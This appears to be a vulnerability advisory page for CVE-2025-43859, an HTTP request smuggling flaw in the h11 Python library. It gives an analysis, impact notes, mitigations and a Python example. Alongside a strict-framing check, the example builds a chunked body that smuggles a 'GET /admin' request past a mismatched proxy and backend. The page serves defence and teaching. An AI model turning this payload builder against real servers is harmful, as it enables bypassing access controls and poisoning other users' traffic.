
CVE-2025-43859: CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in python-hyper h11

Medium
Published: Thu Apr 24 2025 (04/24/2025, 18:15:53 UTC)
Source: CVE
Vendor/Project: python-hyper
Product: h11

Description

h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.

AI-Powered Analysis

Last updated: 06/24/2025, 07:57:27 UTC

Technical Analysis

CVE-2025-43859 affects h11, the python-hyper project's pure-Python implementation of HTTP/1.1. In versions prior to 0.16.0, h11 is lenient about the line terminators that delimit chunks in a chunked-coding message body (Transfer-Encoding: chunked): it accepts framing that a strict RFC 9112 parser would reject. The weakness is classified as CWE-444, Inconsistent Interpretation of HTTP Requests (HTTP Request/Response Smuggling).

Request smuggling exploits a disagreement between two HTTP parsers on the same path, typically a reverse proxy or load balancer in front and the application server behind it, about where one request ends and the next begins. If the front end forwards bytes it considers part of a single request, and the back end reads those same bytes as the end of one request plus the start of a second, the second request reaches the backend without passing the front end's routing, authentication or filtering rules. For this CVE the leniency in h11 alone is not enough: a strict proxy rejects or normalizes the ambiguous body before h11 ever sees it. Exploitation therefore requires a (reverse) proxy that is itself lenient about chunked framing in a way that does not match h11's, which is why the CVE text notes that fixing either component is sufficient to mitigate the issue. No exploitation in the wild has been reported to date.

Affected deployments are applications that speak HTTP/1.1 through h11, in particular those behind reverse proxies or load balancers with inconsistent chunked-body parsing. As with other request smuggling issues, a successful desync can bypass edge security controls, poison shared caches, hijack or poison responses destined for other users (enabling cross-user and script injection attacks), and disrupt availability.

Potential Impact

For European organizations, the impact of this vulnerability can be significant in environments where python-hyper's h11 library is used, especially in web services or APIs behind reverse proxies. Exploitation could lead to unauthorized access to sensitive data, session hijacking, or manipulation of HTTP traffic, undermining confidentiality and integrity. Additionally, it could enable attackers to bypass web application firewalls or intrusion detection systems, increasing the risk of further attacks. Availability could also be affected if attackers use request smuggling to cause denial-of-service conditions or disrupt normal traffic flow. Sectors with high reliance on Python-based web frameworks or microservices architectures, such as finance, healthcare, and critical infrastructure, may face elevated risks. The complexity of exploitation requiring a combination of vulnerable components reduces the likelihood of widespread attacks but does not eliminate targeted attacks against high-value European targets. Organizations using reverse proxies or load balancers with known parsing inconsistencies are particularly at risk.

Mitigation Recommendations

1. Upgrade the python-hyper h11 library to version 0.16.0 or later, which contains the fix. h11 is often installed as a transitive dependency of HTTP client and server libraries, so check lock files and container images, not only direct requirements.
2. Audit and update reverse proxies, load balancers, and other HTTP intermediaries to versions that parse chunked transfer encoding strictly. Per the CVE text, a correctly behaving proxy alone removes the exploitable combination.
3. Enforce strict HTTP request validation and normalization at the edge: reject chunked bodies whose framing deviates from RFC 9112 (for example, chunk data not followed by CRLF, or bare LF line endings) rather than forwarding them.
4. Test the HTTP request handling chain end to end to identify any component pair that frames the same request bytes differently.
5. Employ web application firewalls (WAFs) with rules that detect request smuggling patterns.
6. Monitor HTTP traffic logs for anomalies indicative of smuggling attempts, such as unexpected request boundaries, malformed chunk framing, or duplicated framing headers.
7. Where feasible, use HTTP/2 end to end; it is not susceptible to this class of framing ambiguity. Note that HTTP/2 terminated at the proxy and downgraded to HTTP/1.1 towards h11 does not help, because the chunked body is reconstructed on the backend leg.
8. Educate development and operations teams about the risks of HTTP request smuggling and the importance of consistent HTTP parsing across components.
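The desync mechanism from the Technical Analysis and the edge check from mitigation items 3 and 4, as an added worked example written for this page. It is illustrative code, not h11's source and not the code of any particular proxy. Two parsing leniencies are modelled as assumptions: a backend that skips the two bytes after chunk data without checking that they are CRLF, standing in for the class of bug the advisory attributes to h11 before 0.16.0, and a proxy that accepts a bare LF as a line terminator. The smuggled request, the host name and the X-Pad padding header are constructed sample data.

```python
"""Chunked-body framing: a strict RFC 9112 decoder beside two modelled
leniencies, and the desync that appears when proxy and backend disagree.
Illustrative code for this page, not h11's source and not any proxy's.
Assumed, not taken from real implementations: SKIP_TWO stands for the class
of bug the advisory describes for h11 < 0.16.0 (bytes after chunk data not
checked to be CRLF); BARE_LF stands for a proxy accepting a lone LF."""
import enum
import re

class FramingError(ValueError):
    """The body is malformed under the selected parsing mode."""

class Mode(enum.Enum):
    STRICT = "strict"      # chunk data MUST be followed by CRLF
    SKIP_TWO = "skip_two"  # modelled backend bug: eat two bytes, whatever they are
    BARE_LF = "bare_lf"    # modelled proxy leniency: a lone LF ends a line

def _read_line(buf: bytes, pos: int, mode: Mode) -> tuple:
    """Return (line without terminator, position just after the terminator)."""
    term = b"\n" if mode is Mode.BARE_LF else b"\r\n"
    end = buf.find(term, pos)
    if end == -1:
        raise FramingError("missing line terminator")
    line = buf[pos:end]
    if mode is Mode.BARE_LF and line.endswith(b"\r"):
        line = line[:-1]  # BARE_LF tolerates CRLF as well as a bare LF
    return line, end + len(term)

def decode_chunked(buf: bytes, mode: Mode) -> tuple:
    """Decode one chunked body at buf[0]; return (body, bytes_consumed).
    bytes_consumed is where this parser believes the NEXT message starts,
    the one value every hop must agree on to avoid request smuggling."""
    pos, out = 0, bytearray()
    while True:
        line, pos = _read_line(buf, pos, mode)
        size_field = line.split(b";", 1)[0].strip()  # drop chunk extensions
        if not re.fullmatch(rb"[0-9A-Fa-f]+", size_field):
            raise FramingError("bad chunk-size line %r" % line)
        size = int(size_field, 16)
        if size == 0:  # last-chunk: optional trailer lines, then an empty line
            while True:
                line, pos = _read_line(buf, pos, mode)
                if line == b"":
                    return bytes(out), pos
        if len(buf) - pos < size + 2:
            raise FramingError("truncated chunk")
        out += buf[pos:pos + size]
        pos += size
        tail = buf[pos:pos + 2]
        if mode is Mode.SKIP_TWO:
            pos += 2  # the bug: the two bytes are never compared with CRLF
        elif tail == b"\r\n":
            pos += 2
        elif mode is Mode.BARE_LF and tail[:1] == b"\n":
            pos += 1
        else:
            raise FramingError("chunk data not followed by CRLF: %r" % tail)

# Constructed sample request; the path and host are placeholders.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: backend.internal\r\n\r\n"

def build_desync_body(smuggled: bytes = SMUGGLED) -> bytes:
    """Chunked body on which BARE_LF and SKIP_TWO disagree about where it ends.
    Layout: 2 CRLF AB LF "1"+"0"*k CRLF CRLF <padded smuggled> CRLF 0 CRLF CRLF
    BARE_LF : "AB" ends at the LF; size line "10..0" = 16**k, so the CRLF plus
              the padded request are chunk data; then the last-chunk. One request.
    SKIP_TWO: "AB", then LF and "1" are eaten blindly; size line "0..0" = 0;
              the next CRLF is the empty line, body finished. Everything after
              it is parsed as a brand-new request."""
    if not smuggled.endswith(b"\r\n\r\n"):
        raise ValueError("smuggled request must end with an empty line")
    pad_hdr = b"X-Pad: "
    k = 1
    while 16 ** k - 2 < len(smuggled) + len(pad_hdr) + 2:
        k += 1
    pad = b"a" * (16 ** k - 2 - len(smuggled) - len(pad_hdr) - 2)
    padded = smuggled[:-2] + pad_hdr + pad + b"\r\n\r\n"  # exactly 16**k - 2 bytes
    return b"2\r\nAB\n1" + b"0" * k + b"\r\n\r\n" + padded + b"\r\n0\r\n\r\n"

def frame_views(body: bytes) -> dict:
    """Where each parser thinks the next message begins (None = rejected).
    Two hops reporting different offsets for the same bytes is a desync."""
    views = {}
    for mode in Mode:
        try:
            views[mode.value] = decode_chunked(body, mode)[1]
        except FramingError:
            views[mode.value] = None
    return views

def is_strictly_framed(body: bytes) -> bool:
    """Edge check: forward only bodies the strict parser accepts."""
    return frame_views(body)["strict"] is not None

if __name__ == "__main__":
    body = build_desync_body()
    print(frame_views(body))  # {'strict': None, 'skip_two': 13, 'bare_lf': 274}
    print("backend's next request:", body[frame_views(body)["skip_two"]:][:21])
```

`frame_views` is the practical check behind mitigation items 3 and 4: run it over captured or fuzzed request bodies in a test harness. A body for which the strict parser returns None while a lenient parser returns an offset is one the edge should reject rather than forward, and two hops that return different offsets for the same bytes are a desync primitive regardless of which specific leniency causes it. The exact leniencies of a real proxy must be taken from its own parser; the two modelled here are assumptions chosen to show the mechanism.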


Technical Details

Data Version
5.1
Assigner Short Name
GitHub_M
Date Reserved
2025-04-17T20:07:08.556Z
Cisa Enriched
true

Threat ID: 682d983fc4522896dcbf0b21

Added to database: 5/21/2025, 9:09:19 AM

Last enriched: 6/24/2025, 7:57:27 AM

Last updated: 8/14/2025, 6:41:46 PM

Views: 22

